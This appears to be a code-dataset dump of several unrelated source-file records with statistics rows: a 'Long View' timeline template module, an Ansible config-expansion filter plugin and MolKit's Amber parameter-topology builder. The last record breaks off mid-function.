background-repeat: repeat-x;
}
/* the block that contains all of the timeline labels on the left side of
* the screen. */
#labels {
position: absolute;
top: 26px;
z-index: 3;
}
/* cell containing a single label on the left side of the screen */
.labelscell {
font-size: 10px;
font-weight: normal;
font-family: verdana, helvetica, arial, sans-serif; /* in order of desirability */
color: #999;
padding-top: 3px;
border: 0;
}
/* the popups themselves */
.node {
position: absolute;
visibility: hidden;
color: #333;
width: 200px;
z-index: 5;
border: 1px solid #999;
background-image: url(./img-static/popup-bg.gif);
padding: 6px;
}
/* The body of the popups (eg the HTML inside the table) */
.popupcell {
font-size: 10px;
font-weight: normal;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
}
/* Popup titles */
.popuptitle {
font-size: 12px;
}
"""
# override the default header top matter from the lvhtml module
headerTop = """<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%s</title>
<link rel="stylesheet" href="./styles.css" />
<script language="javascript" type="text/javascript" src="./rollover.js"></script>
</head>
<body onload="loadimgs();">
<img src="./img-static/no.gif" alt="" width="1" height="25" border="0"><br>
<div align="center">
<table cellpadding="0" cellspacing="0" border="0" width="664">
<tr>
<td colspan="3">
<img src="./img-static/timeline.gif" alt="Timeline" width="664" height="38" border="0"></td>
</tr>
<tr>
<td class="exp" nowrap>
<img src="./img-static/no.gif" alt="" width="5" height="1" border="0">
<span class="txt"><b>%s</b></span><br>
<!-- longview.py unused value hack: %s - %s -->
« On the Record: <a href="http://www.longbets.com/bets" target="_top">Bets</a> | <a href="http://www.longbets.com/predictions" target="_top">Predictions</a></td>
<td class="navcell" align="right" nowrap>
<table class="navtable" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="navlabel">
%s</td>
<td nowrap="nowrap">\n"""
# another override
headerBottom = """</td>
<td class="navlabel">%s</td>
</tr>
</table></td>
<td class="power"><img src="img-static/longview-power.gif" alt="Powered by Long View" width="89" height="22" border="0" /></td>
</td>
</tr>
</table>
<table class="key">
<tr>
<td>
Votes: YES <img src="img-generated/key1.png" alt="" width="65" height="12"> NO</td>
<td>
Discussion Intensity: LESS <img src="img-generated/key2.png" alt="" width="65" height="12"> MORE</td>
</tr>
</table>
</div>
</body>
</html>
"""
| 23.484925 | 167 | 0.642559 | 1,291 | 9,347 | 4.650658 | 0.299768 | 0.018654 | 0.01499 | 0.034644 | 0.380913 | 0.323451 | 0.25533 | 0.231346 | 0.193538 | 0.193538 | 0 | 0.028667 | 0.201348 | 9,347 | 397 | 168 | 23.544081 | 0.77562 | 0.172569 | 0 | 0.403333 | 0 | 0.023333 | 0.980387 | 0.078452 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20af14dd3e3f451b0c30965586bb3662c6ee4a4 | 768 | py | Python | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 85 | 2016-10-06T23:15:14.000Z | 2017-09-15T00:52:25.000Z | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 739 | 2016-09-19T21:48:58.000Z | 2017-09-15T17:46:52.000Z | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 47 | 2016-09-22T21:32:12.000Z | 2017-09-14T21:00:53.000Z | import copy, os
from ansible import errors
def expand_config(config_data):
try:
all_data = copy.deepcopy(expand_envs(config_data))
return all_data
except Exception, e:
raise errors.AnsibleFilterError(
'expand_config plugin error: {0}, config_data={1}'.format(
str(e),
str(config_data)))
def expand_envs(obj):
if isinstance(obj, dict):
return { key: expand_envs(val) for key, val in obj.items()}
if isinstance(obj, list):
return [ expand_envs(item) for item in obj ]
if isinstance(obj, basestring):
return os.path.expandvars(obj)
return obj
class FilterModule(object):
''' Expand Kraken configuration file '''
def filters(self):
return {
'expand_config': expand_config
}
| 26.482759 | 70 | 0.669271 | 101 | 768 | 4.950495 | 0.475248 | 0.096 | 0.09 | 0.072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003356 | 0.223958 | 768 | 28 | 71 | 27.428571 | 0.83557 | 0 | 0 | 0 | 0 | 0 | 0.083791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20eb1e22a6672296afae7cc1ca61eef92581ba3 | 53,916 | py | Python | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | 8 | 2021-12-14T21:30:01.000Z | 2022-02-14T11:30:03.000Z | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
############################################################################
#
# Author: Ruth HUEY, Michel F. SANNER
#
# Copyright: M. Sanner TSRI 2001
#
#############################################################################
# $Header: /opt/cvs/python/packages/share1.5/MolKit/amberPrmTop.py,v 1.32 2007/07/24 17:30:40 vareille Exp $
#
# $Id: amberPrmTop.py,v 1.32 2007/07/24 17:30:40 vareille Exp $
#
#from MolKit.molecule import Atom, AtomSet, Bond
from sff.amber import AmberParm
import numpy.oldnumeric as Numeric, types
from math import pi, sqrt, ceil, fabs
from string import split, strip, join
from os.path import basename
from MolKit.data.all_amino94_dat import all_amino94_dat
from MolKit.data.all_aminont94_dat import all_aminont94_dat
from MolKit.data.all_aminoct94_dat import all_aminoct94_dat
class Parm:
"""class to hold parameters for Amber Force Field calcuations
"""
def __init__(self, allDictList = [all_amino94_dat], ntDictList = [all_aminont94_dat],
ctDictList = [all_aminoct94_dat]):
#amber parameter reference dictionaries:
if len(allDictList)==0:
allDict = all_amino94_dat
else:
allDict = allDictList[0]
if type(allDict)==types.StringType:
allDict = self.getDictObj(allDict)
if len(allDictList)>1:
for d in allDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
allDict.update(d)
#allDict.extend(d)
self.allDict = allDict
if len(ntDictList)==0:
ntDict = all_aminont94_dat
else:
ntDict = ntDictList[0]
if type(ntDict)==types.StringType:
ntDict = self.getDictObj(ntDict)
if len(ntDictList)>1:
for d in ntDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
ntDict.update(d)
#ntDict.extend(d)
self.ntDict = ntDict
if len(ctDictList)==0:
ctDict = all_aminoct94_dat
else:
ctDict = ctDictList[0]
if type(ctDict)==types.StringType:
ctDict = self.getDictObj(ctDict)
if len(ctDictList)>1:
for d in ctDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
ctDict.update(d)
#ctDict.extend(d)
self.ctDict = ctDict
#formatD is used for write method
formatD = {}
for k in ['Iac', 'Iblo', 'Cno', 'Ipres', 'ExclAt']:
formatD[k] = ('%6d', 12, 0)
for k in ['Charges', 'Masses', 'Rk', 'Req', 'Tk', 'Teq',\
'Pk', 'Pn', 'Phase', 'Solty', 'Cn1', 'Cn2']:
formatD[k] = ('%16.8E', 5, 0)
for k in ['AtomNames', 'ResNames', 'AtomSym', 'AtomTree']:
formatD[k] = ('%-4.4s', 20, 0)
for k in ['allHBnds', 'allBnds']:
formatD[k] = ('%6d', 12, 3)
for k in ['allHAngs', 'allAngs']:
formatD[k] = ('%6d', 12, 4)
for k in ['allHDihe', 'allDihe']:
formatD[k] = ('%6d', 12, 5)
self.formatD = formatD
#processAtoms results are built in this dictionary
self.prmDict = {}
def getDictObj(self, nmstr):
#mod = __import__('MolKit/data/' + nmstr)
#dict = eval('mod.'+ nmstr)
mod = __import__('MolKit')
b = getattr(mod.data, nmstr)
dict = getattr(b, nmstr)
return dict
def loadFromFile(self, filename):
"""reads a parmtop file"""
self.prmDict = self.py_read(filename)
self.createSffCdataStruct(self.prmDict)
def processAtoms(self, atoms, parmDict=None, reorder=1):
"""finds all Amber parameters for the given set of atoms
parmDict is parm94_dat """
if atoms:
self.build(atoms, parmDict, reorder)
self.createSffCdataStruct(self.prmDict)
print 'after call to createSffCdataStruct'
def checkSanity(self):
d = self.prmDict
#length checks:
Natom = d['Natom']
assert len(d['Charges']) == Natom
assert len(d['Masses']) == Natom
assert len(d['Iac']) == Natom
assert len(d['Iblo']) == Natom
assert len(d['AtomRes']) == Natom
assert len(d['N14pairs']) == Natom
assert len(d['TreeJoin']) == Natom
Nres = d['Nres']
assert len(d['Ipres']) == Nres + 1
assert len(d['AtomNames']) == Natom * 4 + 81
assert len(d['AtomSym']) == Natom * 4 + 81
assert len(d['AtomTree']) == Natom * 4 + 81
assert len(d['ResNames']) == Nres * 4 + 81
#Ntypes is number of unique amber_types w/equiv replacement
Ntypes = d['Ntypes']
assert len(d['Cno']) == Ntypes**2
assert len(d['ExclAt']) == d['Nnb']
assert len(d['Cn1']) == Ntypes*(Ntypes+1)/2.
assert len(d['Cn2']) == Ntypes*(Ntypes+1)/2.
#Numbnd is number of bnd types
Numbnd = d['Numbnd']
assert len(d['Rk']) == Numbnd
assert len(d['Req']) == Numbnd
#Numang is number of angle types
Numang = d['Numang']
assert len(d['Tk']) == Numang
assert len(d['Teq']) == Numang
#Numptra is number of dihe types
Nptra = d['Nptra']
assert len(d['Pk']) == Nptra
assert len(d['Pn']) == Nptra
assert len(d['Phase']) == Nptra
assert len(d['Solty']) == d['Natyp']
#Nbona is number of bonds w/out H
Nbona = d['Nbona']
assert len(d['BondAt1']) == Nbona
assert len(d['BondAt2']) == Nbona
assert len(d['BondNum']) == Nbona
#Nbonh is number of bonds w/ H
Nbonh = d['Nbonh']
assert len(d['BondHAt1']) == Nbonh
assert len(d['BondHAt2']) == Nbonh
assert len(d['BondHNum']) == Nbonh
#Ntheta is number of angles w/out H
Ntheta = d['Ntheta']
assert len(d['AngleAt1']) == Ntheta
assert len(d['AngleAt2']) == Ntheta
assert len(d['AngleAt3']) == Ntheta
assert len(d['AngleNum']) == Ntheta
#Ntheth is number of angles w/ H
Ntheth = d['Ntheth']
assert len(d['AngleHAt1']) == Ntheth
assert len(d['AngleHAt2']) == Ntheth
assert len(d['AngleHAt3']) == Ntheth
assert len(d['AngleHNum']) == Ntheth
#Nphia is number of dihedrals w/out H
Nphia = d['Nphia']
assert len(d['DihAt1']) == Nphia
assert len(d['DihAt2']) == Nphia
assert len(d['DihAt3']) == Nphia
assert len(d['DihAt4']) == Nphia
assert len(d['DihNum']) == Nphia
#Nphih is number of dihedrals w/ H
Nphih = d['Nphih']
assert len(d['DihHAt1']) == Nphih
assert len(d['DihHAt2']) == Nphih
assert len(d['DihHAt3']) == Nphih
assert len(d['DihHAt4']) == Nphih
assert len(d['DihHNum']) == Nphih
##WHAT ABOUT HB10, HB12, N14pairs, N14pairlist
#value based on length checks:
#all values of BondNum and BondHNum in range (1, Numbnd)
for v in d['BondNum']:
assert v >0 and v < Numbnd + 1
for v in d['BondHNum']:
assert v >0 and v < Numbnd + 1
#all values of AngleNum and AngleHNum in range (1, Numang)
for v in d['AngleNum']:
assert v >0 and v < Numang + 1
for v in d['AngleHNum']:
assert v >0 and v < Numang + 1
#all values of DihNum and DihHNum in range (1, Nptra)
for v in d['DihNum']:
assert v >0 and v < Nptra + 1
for v in d['DihHNum']:
assert v >0 and v < Nptra + 1
def createSffCdataStruct(self, dict):
"""Create a C prm data structure"""
print 'in createSffCdataStruct'
self.ambPrm = AmberParm('test1', parmdict=dict)
print 'after call to init'
def build(self, allAtoms, parmDict, reorder):
# find out amber special residue name and
# order the atoms inside a residue to follow the Amber convention
self.residues = allAtoms.parent.uniq()
self.residues.sort()
self.fixResNamesAndOrderAtoms(reorder)
# save ordered chains
self.chains = self.residues.parent.uniq()
self.chains.sort()
# save ordered atoms
self.atoms = self.residues.atoms
# renumber them
self.atoms.number = range(1, len(allAtoms)+1)
print 'after call to checkRes'
self.getTopology(self.atoms, parmDict)
print 'after call to getTopology'
if reorder:
self.checkSanity()
print 'passed sanity check'
else:
print 'skipping sanity check'
return
def reorderAtoms(self, res, atList):
ats = []
rlen = len(res.atoms)
if rlen!=len(atList):
print "atoms missing in residue", res
print "expected:", atList
print "found :", res.atoms.name
for i in range(rlen):
a = atList[i]
for j in range(rlen):
b = res.atoms[j]
# DON'T rename HN atom H, HN1->H1, etc...
# use editCommands instead
#if b.name=='HN': b.name='H'
#elif len(b.name)==3 and b.name[:2]=='HN':
#b.name ='H'+b.name[2]
if b.name==a:
ats.append(b)
break
if len(ats)==len(res.atoms):
res.children.data = ats
res.atoms.data = ats
def fixResNamesAndOrderAtoms(self, reorder):
# level list of atom names used to rename residues
# check is HIS is HIS, HID, HIP, HIE, etc...
residues = self.residues
last = len(residues)-1
for i in range(len(residues)):
residue = residues[i]
chNames = residue.atoms.name
amberResType = residue.type
if amberResType=='CYS':
returnVal = 'CYS'
#3/21:
if 'HSG' in chNames or 'HG' in chNames:
amberResType ='CYS'
elif 'HN' in chNames:
amberResType = 'CYM'
else:
amberResType = 'CYX'
elif amberResType=='LYS':
# THIS DOESN'T SUPPORT LYH assigned in all.in
returnVal = 'LYS'
if 'HZ1' in chNames or 'HZN1' in chNames:
amberResType ='LYS'
else:
amberResType ='LYN'
elif amberResType=='ASP':
returnVal = 'ASP'
#3/21
if 'HD' in chNames or 'HD2' in chNames:
amberResType ='ASH'
else:
amberResType ='ASP'
elif amberResType=='GLU':
returnVal = 'GLU'
#3/21
if 'HE' in chNames or 'HE2' in chNames:
amberResType ='GLH'
else:
amberResType ='GLU'
elif amberResType=='HIS':
returnVal = 'HIS'
hasHD1 = 'HD1' in chNames
hasHD2 = 'HD2' in chNames
hasHE1 = 'HE1' in chNames
hasHE2 = 'HE2' in chNames
if hasHD1 and hasHE1:
if hasHD2 and not hasHE2:
amberResType = 'HID'
elif hasHD2 and hasHE2:
amberResType = 'HIP'
elif (not hasHD1) and (hasHE1 and hasHD2 and hasHE2):
amberResType = 'HIE'
else:
print 'unknown HISTIDINE config'
raise ValueError
residue.amber_type = amberResType
if residue == residue.parent.residues[0]:
residue.amber_dict = self.ntDict[amberResType]
elif residue == residue.parent.residues[-1]:
residue.amber_dict = self.ctDict[amberResType]
else:
residue.amber_dict = self.allDict[amberResType]
if reorder:
self.reorderAtoms(residue, residue.amber_dict['atNameList'])
def processChain(self, residues, parmDict):
#this should be called with a list of residues representing a chain
# NOTE: self.parmDict is parm94 which was parsed by Ruth while parmDict is
# MolKit.parm94_dat.py
dict = self.prmDict
#residues = self.residues
# initialize
atNames = ''
atSym = ''
atTree = ''
resname = ''
masses = dict['Masses']
charges = dict['Charges']
uniqList = []
uniqTypes = {} # used to build list with equivalent names removed
atypTypes = {} # used to build list without equivalent names removed
allTypeList = [] # list of all types
last = len(residues)-1
dict['Nres'] = dict['Nres'] + last + 1
atres = dict['AtomRes']
ipres = dict['Ipres']
maxResLen = 0
for i in range(last+1):
res = residues[i]
atoms = res.atoms
nbat = len(atoms)
if nbat > maxResLen: maxResLen = nbat
ipres.append(ipres[-1]+nbat)
resname = resname + res.amber_type + ' '
ad = res.amber_dict
pdm = parmDict.atomTypes
for a in atoms:
# get the amber atom type
name = a.name
atres.append(i+1)
atNames = atNames+'%-4s'%name
atD = ad[name]
a.amber_type = newtype = '%-2s'%atD['type']
chg = a._charges['amber'] = atD['charge']*18.2223
charges.append(chg)
mas = a.mass = pdm[newtype][0]
masses.append(mas)
atTree = atTree+'%-4.4s'%atD['tree']
allTypeList.append(newtype)
atSym = atSym+'%-4s'%newtype
symb = newtype[0]
if symb in parmDict.AtomEquiv.keys():
if newtype in parmDict.AtomEquiv[symb]:
newsym = symb + ' '
uniqTypes[symb+' '] = 0
a.amber_symbol = symb+' '
if newsym not in uniqList:
uniqList.append(newsym)
else:
uniqTypes[newtype] = 0
a.amber_symbol = newtype
if newtype not in uniqList:
uniqList.append(newtype)
else:
uniqTypes[newtype] = 0
a.amber_symbol = newtype
if newtype not in uniqList: uniqList.append(newtype)
# to get uniq list of all types w/out equiv replacement
atypTypes[newtype] = 0
# post processing of some variable
dict['AtomNames'] = dict['AtomNames'] + atNames
dict['AtomSym'] = dict['AtomSym'] + atSym
dict['AtomTree'] = dict['AtomTree'] + atTree
dict['ResNames'] = dict['ResNames'] + resname
# save list of unique types for later use
###1/10:
#self.uniqTypeList = uniqList
uL = self.uniqTypeList
for t in uniqList:
if t not in uL:
uL.append(t)
#self.uniqTypeList = uniqTypes.keys()
self.uniqTypeList = uL
ntypes = len(uL)
dict['Ntypes'] = ntypes
aL = self.atypList
for t in atypTypes.keys():
if t not in aL:
aL.append(t)
self.atypList = aL
dict['Natyp'] = len(aL)
dict['Ntype2d'] = ntypes*ntypes
dict['Nttyp'] = ntypes * (ntypes+1)/2
if maxResLen > dict['Nmxrs']:
dict['Nmxrs'] = maxResLen
newtypelist = []
for t in residues.atoms.amber_symbol:
# Iac is 1-based
newtypelist.append( self.uniqTypeList.index(t) + 1 )
###1/10:
#dict['Iac'] = newtypelist
dict['Iac'].extend( newtypelist)
def processBonds(self, bonds, parmDict):
# NOTE: self,parmDict is parm94 parsed by Ruth while parmDict is
# MolKit.parm94_dat.py):
dict = self.prmDict
bat1 = dict['BondAt1']
bat2 = dict['BondAt2']
bnum = dict['BondNum']
batH1 = dict['BondHAt1']
batH2 = dict['BondHAt2']
bHnum = dict['BondHNum']
rk = dict['Rk']
req = dict['Req']
bndTypes = {} # used to build a unique list of bond types
btDict = parmDict.bondTypes #needed to check for wildcard * in type
for b in bonds:
a1 = b.atom1
#t1 = a1.amber_symbol
t1 = a1.amber_type
a2 = b.atom2
#t2 = a2.amber_symbol
t2 = a2.amber_type
if t1<t2:
newtype = '%-2.2s-%-2.2s'%(t1,t2)
else:
newtype = '%-2.2s-%-2.2s'%(t2,t1)
bndTypes[newtype] = 0
n1 = (a1.number-1)*3
n2 = (a2.number-1)*3
if n2<n1: tmp=n1; n1=n2; n2=tmp
if a1.element=='H' or a2.element=='H':
bHnum.append(newtype)
batH1.append(n1)
batH2.append(n2)
else:
bnum.append(newtype)
bat1.append(n1)
bat2.append(n2)
dict['Numbnd'] = len(bndTypes)
btlist = bndTypes.keys()
for bt in btlist:
rk.append( btDict[bt][0] )
req.append( btDict[bt][1] )
newbnum = []
for b in bnum:
newbnum.append( btlist.index(b) + 1 )
dict['BondNum'] = newbnum
newbnum = []
for b in bHnum:
newbnum.append( btlist.index(b) + 1 )
dict['BondHNum'] = newbnum
return
def processAngles(self, allAtoms, parmDict):
dict = self.prmDict
aa1 = dict['AngleAt1']
aa2 = dict['AngleAt2']
aa3 = dict['AngleAt3']
anum = dict['AngleNum']
aHa1 = dict['AngleHAt1']
aHa2 = dict['AngleHAt2']
aHa3 = dict['AngleHAt3']
aHnum = dict['AngleHNum']
tk = dict['Tk']
teq = dict['Teq']
angTypes = {}
atdict = parmDict.bondAngles
for a1 in allAtoms:
t1 = a1.amber_type
for b in a1.bonds:
a2 = b.atom1
if id(a2)==id(a1): a2=b.atom2
t2 = a2.amber_type
for b2 in a2.bonds:
a3 = b2.atom1
if id(a3)==id(a2): a3=b2.atom2
if id(a3)==id(a1): continue
if a1.number > a3.number: continue
t3 = a3.amber_type
nn1 = n1 = (a1.number-1)*3
nn2 = n2 = (a2.number-1)*3
nn3 = n3 = (a3.number-1)*3
if n3<n1:
nn3 = n1
nn1 = n3
rev = 0
if (t1==t3 and a1.name > a3.name) or t3 < t1:
rev = 1
if rev:
newtype = '%-2.2s-%-2.2s-%-2.2s'%(t3,t2,t1)
else:
newtype = '%-2.2s-%-2.2s-%-2.2s'%(t1, t2, t3)
#have to check for wildcard *
angTypes[newtype] = 0
if a1.element=='H' or a2.element=='H' or a3.element=='H':
aHa1.append( nn1 )
aHa2.append( nn2 )
aHa3.append( nn3 )
aHnum.append(newtype)
else:
aa1.append( nn1 )
aa2.append( nn2 )
aa3.append( nn3 )
anum.append(newtype)
atlist = angTypes.keys()
torad = pi / 180.0
atKeys = atdict.keys()
for t in atlist:
tk.append( atdict[t][0] )
teq.append( atdict[t][1]*torad )
anewlist = []
for a in anum:
anewlist.append( atlist.index( a ) + 1 )
dict['AngleNum'] = anewlist
anewlist = []
for a in aHnum:
anewlist.append( atlist.index( a ) + 1 )
dict['AngleHNum'] = anewlist
dict['Numang'] = len(atlist)
dict['Ntheth'] = len(aHa1)
dict['Mtheta'] = len(aa1)
dict['Ntheta'] = len(aa1)
return
def checkDiheType(self, t, t2, t3, t4, dict):
#zero X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t,t2,t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t4,t3,t2,t)
if dict.has_key(newtype): return newtype
#X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,t)
if dict.has_key(newtype): return newtype
#2X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,'X')
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,'X')
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t2,t)
if dict.has_key(newtype): return newtype
raise RuntimeError('dihedral type not in dictionary')
## it is slower to check a list if the key is in there than to ask a
## dictionanry if it has this key
##
## keys = dict.keys()
## #zero X
## newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t,t2,t3,t4)
## if newtype in keys:
## return newtype
## newtype2 = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t4,t3,t2,t)
## if newtype2 in keys:
## return newtype2
## #X
## newtypeX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,t4)
## if newtypeX in keys:
## return newtypeX
## newtype2X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,t)
## if newtype2X in keys:
## return newtype2X
## #2X
## newtypeX_X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,'X')
## if newtypeX_X in keys:
## return newtypeX_X
## newtype2X_X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,'X')
## if newtype2X_X in keys:
## return newtype2X_X
## newtypeXX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t3,t4)
## if newtypeXX in keys:
## return newtypeXX
## newtype2XX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t2,t)
## if newtype2XX in keys:
## return newtype2XX
## raise RuntimError('dihedral type not in dictionary')
def processTorsions(self, allAtoms, parmDict):
# find torsions and also excuded atoms
dict = self.prmDict
foundDihedTypes = {}
ta1 = dict['DihAt1']
ta2 = dict['DihAt2']
ta3 = dict['DihAt3']
ta4 = dict['DihAt4']
tnum = dict['DihNum']
taH1 = dict['DihHAt1']
taH2 = dict['DihHAt2']
taH3 = dict['DihHAt3']
taH4 = dict['DihHAt4']
tHnum = dict['DihHNum']
nb14 = dict['N14pairs']
n14list = dict['N14pairlist']
iblo = dict['Iblo']
exclAt = dict['ExclAt']
dihedTypes = parmDict.dihedTypes
for a1 in allAtoms:
n14 = []
excl = []
t1 = a1.amber_type
restyp = a1.parent.type
if restyp in ['PRO', 'TRP', 'HID', 'HIE', 'HIP']:
ringlist = self.AA5rings[restyp]
else:
ringlist = None
for b in a1.bonds:
a2 = b.atom1
if id(a2)==id(a1): a2=b.atom2
t2 = a2.amber_type
if a2.number > a1.number: excl.append(a2.number)
for b2 in a2.bonds:
a3 = b2.atom1
if id(a3)==id(a2): a3=b2.atom2
if id(a3)==id(a1): continue
if a3.number > a1.number: excl.append(a3.number)
t3 = a3.amber_type
for b3 in a3.bonds:
a4 = b3.atom1
if id(a4)==id(a3): a4=b3.atom2
if id(a4)==id(a2): continue
if id(a4)==id(a1): continue
if a1.number > a4.number: continue
excl.append(a4.number)
t4 = a4.amber_type
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t1,t2,t3,t4)
dtype = self.checkDiheType(t1,t2,t3,t4,dihedTypes)
for i in range(len(dihedTypes[dtype])):
tname = dtype+'_'+str(i)
foundDihedTypes[tname] = 0
sign3 = 1
period = dihedTypes[dtype][i][3]
if period < 0.0: sign3= -1
if a4.parent==a1.parent:
if ringlist and a4.name in ringlist \
and a1.name in ringlist:
sign3= -1
if a1.element=='H' or a2.element=='H' or \
a3.element=='H' or a4.element=='H':
taH1.append( (a1.number-1)*3 )
taH2.append( (a2.number-1)*3 )
taH3.append( sign3*(a3.number-1)*3 )
taH4.append( (a4.number-1)*3 )
tHnum.append( tname )
else:
ta1.append( (a1.number-1)*3 )
ta2.append( (a2.number-1)*3 )
ta3.append( sign3*(a3.number-1)*3 )
ta4.append( (a4.number-1)*3 )
tnum.append( tname )
if sign3>0.0:
# this trick work only for 6 rings and
# prevents from adding 14 interactions
# twice between atoms in the ring
# PRO, TRP and HIS and cp. have to be handle
# separately
num = a4.number-1
if num not in n14:
n14.append( num )
else: # make 3rd atom in torsion negative
ta3[-1] = -ta3[-1]
if len(excl):
# excl can contain duplicated values (pro tyr phe cycles)
# we also sort the values (probably only comsetics)
excl.sort()
last = excl[0]
uexcl = [last]
for i in range(1,len(excl)):
if excl[i]!=last:
last = excl[i]
uexcl.append(last)
iblo.append(len(uexcl))
exclAt.extend(uexcl)
else:
iblo.append( 1 )
exclAt.append( 0 )
nb14.append(len(n14))
##!##1/28: n14.sort()
n14list.extend(n14)
# remember how many proper diehedrals
lastProper = len(tnum)
lastHProper = len(tHnum)
# loop over residues to add improper torsions
sumAts = 0
foundImproperDihedTypes = {}
for res in self.residues:
foundImproperDihedTypes = self.getImpropTors(
res, sumAts, foundImproperDihedTypes, parmDict)
sumAts = sumAts + len(res.atoms)
#typeDict = foundDihedTypes.copy()
#typeDict.update(foundImproperDihedTypes)
#print typeDict.keys()
dict['Nptra'] = len(foundDihedTypes) + len(foundImproperDihedTypes)
dict['Mphia'] = dict['Nphia'] = len(ta1)
dict['Nphih'] = len(taH1)
pn = dict['Pn']
pk = dict['Pk']
phase = dict['Phase']
dtlist = foundDihedTypes.keys()
torad = pi/180.
for t in dtlist:
index = int(t[-1])
val = dihedTypes[t[:-2]][index] # remove the '_x'
pk.append(val[1]/val[0])
phase.append(val[2]*torad)
pn.append(fabs(val[3]))
dihedTypes = parmDict.improperDihed
dtlist1 = foundImproperDihedTypes.keys()
for t in dtlist1:
val = dihedTypes[t]
pk.append(val[0])
phase.append(val[1]*torad)
pn.append(val[2])
typenum = []
dtlist = dtlist + dtlist1
for t in tnum:
typenum.append( dtlist.index(t) + 1 ) # types are 1-based
dict['DihNum'] = typenum
typenum = []
for t in tHnum:
typenum.append( dtlist.index(t) + 1 ) # types are 1-based
dict['DihHNum'] = typenum
dict['Nnb'] = len(dict['ExclAt'])
#print len(tnum), len(dict['DihNum'])
return
def getImpropTors(self, res, sumAts, foundDihedTypes, parmDict):
#eg tList:[['CA','+M','C','0'],['-M','CA','N','H']]
dict = self.prmDict
offset = sumAts * 3
nameList = res.atoms.name
typeList = res.atoms.amber_type
ta1 = dict['DihAt1']
ta2 = dict['DihAt2']
ta3 = dict['DihAt3']
ta4 = dict['DihAt4']
tnum = dict['DihNum']
taH1 = dict['DihHAt1']
taH2 = dict['DihHAt2']
taH3 = dict['DihHAt3']
taH4 = dict['DihHAt4']
tHnum = dict['DihHNum']
dihedTypes = parmDict.improperDihed
atNameList = res.amber_dict['atNameList']
resat = res.atoms
for item in res.amber_dict['impropTors']:
atomNum = []
atomType = []
newTors = []
offset = res.atoms[0].number
#use hasH to detect 'HZ2' etc
hasH = 0
for t in item:
if t[0]=='H': hasH = 1
if len(t)==2 and t[1]=='M':
if t[0]=='-':
atomType.append('C ')
atomNum.append(offset - 2)
else:
atomType.append('N ')
atomNum.append(offset + len(res.atoms) )
else:
atIndex = atNameList.index(t)
atom = resat[atIndex]
atomType.append(atom.amber_type)
atomNum.append( atom.number )
newType = self.checkDiheType(atomType[0], atomType[1],
atomType[2], atomType[3],
dihedTypes)
foundDihedTypes[newType] = 0
if hasH:
taH1.append( (atomNum[0]-1)*3 )
taH2.append( (atomNum[1]-1)*3 )
taH3.append(-(atomNum[2]-1)*3 )
taH4.append(-(atomNum[3]-1)*3 )
tHnum.append(newType)
else:
ta1.append( (atomNum[0]-1)*3 )
